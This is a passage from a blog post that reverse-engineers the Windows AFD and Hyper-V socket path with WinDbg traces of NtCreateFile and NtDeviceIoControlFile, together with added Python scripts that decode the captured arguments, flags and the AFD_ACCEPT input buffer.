vertical-align: baseline;">socket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), then mswsock!SockGetTdiName (with the Hyper-V RAW GUID). esi holds a pointer to a structure whose size is at least 0xCC. 
The variable mswsock!SockTLNPIListenerCount equals 1, GetCurrentProcess is not called, </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\\Device\\Afd\\Endpoint is initialized again, and NtCreateFile is called again:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS NtCreateFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PHANDLE FileHandle, - 00F6F4A4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ACCESS_MASK DesiredAccess, - C0140000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ POBJECT_ATTRIBUTES ObjectAttributes, - </span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00F6F460</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, - 00F6F480</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_opt_ PLARGE_INTEGER AllocationSize, - 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG FileAttributes, - 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG ShareAccess, - 3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG CreateDisposition, - 3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG CreateOptions, - 0x20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID EaBuffer, - 00F6F4DC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG EaLength - 39</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _OBJECT_ATTRIBUTES </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00F6F460</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_OBJECT_ATTRIBUTES *)0xf6f460)) [Type: _OBJECT_ATTRIBUTES]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Length : 0x18 [Type: unsigned long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x004] RootDirectory : 0x0 [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] ObjectName : 0xf6f454 : "\Device\Afd\Endpoint" [Type: _UNICODE_STRING *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x00c] Attributes : 0x42 [Type: unsigned long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] SecurityDescriptor : 0x0 [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x014] SecurityQualityOfService : 0x0 [Type: void *]</span></div>
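<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added illustration (this is example code written for this edit, not code from the post or from Windows), the script below does by hand what dtx did above: it parses a 32-bit _OBJECT_ATTRIBUTES and _UNICODE_STRING from a memory image and turns the raw NtCreateFile arguments captured above (DesiredAccess C0140000, ShareAccess 3, CreateDisposition 3, CreateOptions 0x20, Attributes 0x42, EaLength 39) into their SDK flag names. The structure addresses 00F6F460 and 00F6F454 come from the WinDbg output; the memory image and the wide-string buffer address 00F6F420 are constructed for the example.</span></div>

```python
"""Decode a captured 32-bit (WoW64) NtCreateFile call the way `dtx` does.

Added example, not code from the original post. The struct offsets and the
argument values are from the WinDbg session; the memory image is constructed.
"""
import struct

# Flag tables (values as defined in the Windows SDK / ntifs.h).
ACCESS_MASK_BITS = {
    0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL",
    0x00100000: "SYNCHRONIZE", 0x00080000: "WRITE_OWNER",
    0x00040000: "WRITE_DAC", 0x00020000: "READ_CONTROL", 0x00010000: "DELETE",
}
SHARE_BITS = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {0: "FILE_SUPERSEDE", 1: "FILE_OPEN", 2: "FILE_CREATE",
               3: "FILE_OPEN_IF", 4: "FILE_OVERWRITE", 5: "FILE_OVERWRITE_IF"}
CREATE_OPTION_BITS = {
    0x01: "FILE_DIRECTORY_FILE", 0x02: "FILE_WRITE_THROUGH",
    0x04: "FILE_SEQUENTIAL_ONLY", 0x08: "FILE_NO_INTERMEDIATE_BUFFERING",
    0x10: "FILE_SYNCHRONOUS_IO_ALERT", 0x20: "FILE_SYNCHRONOUS_IO_NONALERT",
    0x40: "FILE_NON_DIRECTORY_FILE",
}
OBJ_ATTR_BITS = {
    0x002: "OBJ_INHERIT", 0x010: "OBJ_PERMANENT", 0x020: "OBJ_EXCLUSIVE",
    0x040: "OBJ_CASE_INSENSITIVE", 0x080: "OBJ_OPENIF", 0x100: "OBJ_OPENLINK",
    0x200: "OBJ_KERNEL_HANDLE",
}


def decode_flags(value, table):
    """Return the names of the set bits; bits not in the table are reported as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return names


class Memory32:
    """Flat byte image of a 32-bit address range, addressed like the debuggee."""

    def __init__(self, base, size):
        self.base, self.buf = base, bytearray(size)

    def write(self, addr, data):
        self.buf[addr - self.base:addr - self.base + len(data)] = data

    def read(self, addr, size):
        return bytes(self.buf[addr - self.base:addr - self.base + size])


def read_unicode_string(mem, addr):
    """32-bit _UNICODE_STRING: USHORT Length, USHORT MaximumLength, PWSTR Buffer."""
    length, _maxlen, buf = struct.unpack("<HHI", mem.read(addr, 8))
    return mem.read(buf, length).decode("utf-16-le")


def read_object_attributes(mem, addr):
    """32-bit _OBJECT_ATTRIBUTES; field offsets match the dtx output above."""
    length, root, name_ptr, attrs, sd, sqos = struct.unpack("<IIIIII", mem.read(addr, 0x18))
    if length != 0x18:  # Length is the struct size; anything else means a bad pointer
        raise ValueError("bad _OBJECT_ATTRIBUTES.Length %#x" % length)
    return {
        "RootDirectory": root,
        "ObjectName": read_unicode_string(mem, name_ptr) if name_ptr else None,
        "Attributes": decode_flags(attrs, OBJ_ATTR_BITS),
        "SecurityDescriptor": sd,
        "SecurityQualityOfService": sqos,
    }


def decode_ntcreatefile(mem, desired_access, object_attributes, share_access,
                        create_disposition, create_options, ea_length):
    """Turn the raw NtCreateFile argument values into symbolic names."""
    return {
        "DesiredAccess": decode_flags(desired_access, ACCESS_MASK_BITS),
        "ObjectAttributes": read_object_attributes(mem, object_attributes),
        "ShareAccess": decode_flags(share_access, SHARE_BITS),
        "CreateDisposition": DISPOSITION.get(create_disposition, hex(create_disposition)),
        "CreateOptions": decode_flags(create_options, CREATE_OPTION_BITS),
        "EaLength": ea_length,
    }


def build_sample_memory():
    """Constructed stack image with the layout seen in the debugger:
    _OBJECT_ATTRIBUTES at 0x00F6F460 pointing at a _UNICODE_STRING at 0x00F6F454
    (both from the dtx output). The string buffer address 0x00F6F420 is an
    assumption for this example, not a value from the post."""
    mem = Memory32(0x00F6F400, 0x100)
    name = "\\Device\\Afd\\Endpoint".encode("utf-16-le")
    mem.write(0x00F6F420, name + b"\x00\x00")
    mem.write(0x00F6F454, struct.pack("<HHI", len(name), len(name) + 2, 0x00F6F420))
    mem.write(0x00F6F460, struct.pack("<IIIIII", 0x18, 0, 0x00F6F454, 0x42, 0, 0))
    return mem


def decode_captured_call():
    """Decode the exact call captured above (argument values from the WinDbg session)."""
    return decode_ntcreatefile(build_sample_memory(), desired_access=0xC0140000,
                               object_attributes=0x00F6F460, share_access=3,
                               create_disposition=3, create_options=0x20, ea_length=39)


if __name__ == "__main__":
    for key, val in decode_captured_call().items():
        print("%-18s %s" % (key, val))
```

<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Running it shows that mswsock opens the AFD endpoint with GENERIC_READ | GENERIC_WRITE | SYNCHRONIZE | WRITE_DAC, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF, FILE_SYNCHRONOUS_IO_NONALERT, and OBJ_CASE_INSENSITIVE | OBJ_INHERIT on the name; the same decoder can be pointed at a 32-bit memory dump taken with .writemem, and decode_flags reports any bit it does not know as a hex remainder rather than silently dropping it.</span></div>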
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the Windows kernel, inside afd!AfdCreateFile: afd!AfdCheckTDIFilter is not called, afd!AfdAllocateEndpoint executes immediately. After afd!AfdTlFindAndReferenceTransport returns, rax contains:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem @rax -c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda8527f6b8c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803db337530</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda8527dfeeb0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda8527dfedd0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda8527dfeca0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processed 5 items.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IoGetCurrentProcess is called, afd!AfdEndpointsFreeing is compared with 0xA; if it is equal or above, afd!AfdReuseEndpoint and ExReleaseResourceAndLeaveCriticalRegion are executed.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next we see the earlier mentioned afd!AfdTLCreateEndpoint, then afd!AfdTLPendRequest (result – 103h), then afd!AfdCompleteTLEndpCreate; we return from afd!AfdCreate, and then nt!SeClearLearningModeObjectInformation, nt!SeSetLearningModeObjectInformation and nt!ObpCreateHandle follow.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The handle value is 0x148. Now we have two sockets (formally, file objects):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0144: Object: ffffda8529a9bcf0 GrantedAccess: 0016019f (Audit) Entry: ffffca8985cb1510</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8529a9bcf0 Type: (ffffda852718cb00) File</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ObjectHeader: ffffda8529a9bcc0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HandleCount: 1 PointerCount: 32761</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Directory Object: 00000000 Name: \Endpoint {Afd}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0148: Object: ffffda8529acc6d0 GrantedAccess: 0016019f (Inherit) Entry: ffffca8985cb1520</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8529acc6d0 Type: (ffffda852718cb00) File</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ObjectHeader: ffffda8529acc6a0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HandleCount: 1 PointerCount: 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Directory Object: 00000000 Name: \Endpoint {Afd}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next NtDeviceIoControlFile</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 File (---) \Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, 00F6F5D0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 00012010 (afd!AfdAccept)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #0070c0; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00F6F5D8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength, 0xC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd </span><span style="background-color: transparent; color: #4472c4; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00F6F5D8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f5d8 00000000 00000001 00000148 00000000</span></div>
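<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not code from the original post or from any Microsoft component), the following Python script decodes what the trace above shows: it splits the AFD control code 0x12010 into its request number and transfer method, reassembles the 0xC-byte input buffer from the dd dump at 00F6F5D8, and decodes it as the accept request structure. The AFD control-code layout ((FILE_DEVICE_NETWORK << 12) | (request << 2) | method), the request names and the field names UseSAN / SequenceNumber / AcceptHandle are taken from the public ReactOS AFD headers and are an assumption about this kernel build; the 32-bit layout is used because IoIs32bitProcess is checked in afd!AfdAccept.</span></div>

```python
"""Decode an AFD IOCTL and its AFD_ACCEPT input buffer from a WinDbg `dd` dump.

Added example; the control-code layout, request names and structure field
names are assumptions taken from the public ReactOS AFD headers.
"""
from __future__ import annotations

import struct

FSCTL_AFD_BASE = 0x12  # FILE_DEVICE_NETWORK
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")

# AFD request numbers (assumption: public ReactOS afd headers).
AFD_REQUESTS = {
    0: "AFD_BIND", 1: "AFD_CONNECT", 2: "AFD_START_LISTEN", 3: "AFD_WAIT_FOR_LISTEN",
    4: "AFD_ACCEPT", 5: "AFD_RECV", 6: "AFD_RECV_DATAGRAM", 7: "AFD_SEND",
    8: "AFD_SEND_DATAGRAM", 9: "AFD_SELECT", 10: "AFD_DISCONNECT",
    11: "AFD_GET_SOCK_NAME", 12: "AFD_GET_PEER_NAME", 13: "AFD_GET_TDI_HANDLES",
}


def decode_afd_ioctl(code: int) -> dict:
    """Split an AFD control code: (FSCTL_AFD_BASE << 12) | (request << 2) | method."""
    if code >> 12 != FSCTL_AFD_BASE:
        raise ValueError(f"{code:#x} is not an AFD control code")
    request = (code >> 2) & 0x3FF
    return {
        "request": request,
        "name": AFD_REQUESTS.get(request, f"AFD_REQUEST_{request}"),
        "method": METHODS[code & 3],
    }


def parse_dd_line(line: str) -> tuple[int, list[int]]:
    """Parse one line of WinDbg `dd` output: an address followed by up to four dwords."""
    addr, *words = line.replace("`", "").split()
    return int(addr, 16), [int(w, 16) for w in words]


def dd_to_bytes(lines: list[str], length: int) -> bytes:
    """Reassemble little-endian dwords into raw bytes, truncated to the buffer length."""
    raw = b"".join(struct.pack("<I", w) for line in lines for w in parse_dd_line(line)[1])
    if len(raw) < length:
        raise ValueError(f"dump holds {len(raw)} bytes, buffer length is {length}")
    return raw[:length]


def decode_accept_info(buf: bytes, is_32bit_process: bool) -> dict:
    """Decode the AFD_ACCEPT input buffer.

    Assumed layout (ReactOS): ULONG UseSAN, ULONG SequenceNumber, HANDLE AcceptHandle.
    The handle is 4 bytes for a WOW64 caller and 8 bytes for a native x64 caller,
    which is why the 32-bit ServerExample.exe passes InputBufferLength 0xC.
    """
    fmt = "<III" if is_32bit_process else "<IIQ"
    expected = struct.calcsize(fmt)
    if len(buf) != expected:
        raise ValueError(f"expected {expected} bytes, got {len(buf)}")
    use_san, seq, handle = struct.unpack(fmt, buf)
    return {"UseSAN": use_san, "SequenceNumber": seq, "AcceptHandle": handle}


# Values copied from the trace above.
IOCTL_FROM_TRACE = 0x12010
INPUT_LENGTH_FROM_TRACE = 0xC
DD_FROM_TRACE = ["00f6f5d8 00000000 00000001 00000148 00000000"]


def decode_trace() -> dict:
    """Decode the IOCTL and buffer of the NtDeviceIoControlFile call shown above."""
    ioctl = decode_afd_ioctl(IOCTL_FROM_TRACE)
    buf = dd_to_bytes(DD_FROM_TRACE, INPUT_LENGTH_FROM_TRACE)
    info = decode_accept_info(buf, is_32bit_process=True)  # IoIs32bitProcess was true
    return {"ioctl": ioctl, "accept_info": info}


if __name__ == "__main__":
    result = decode_trace()
    print(f"IOCTL {IOCTL_FROM_TRACE:#x}: {result['ioctl']['name']} ({result['ioctl']['method']})")
    for name, value in result["accept_info"].items():
        print(f"  {name:15} = {value:#x}")
```

The decoded AcceptHandle is 0x148, the second \Endpoint {Afd} file object listed above, which is the handle afd!AfdAccept later passes to ObReferenceObjectByHandle; the FileHandle argument of the call (0x144) is the listening socket.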
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to afd!AfdAccept:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
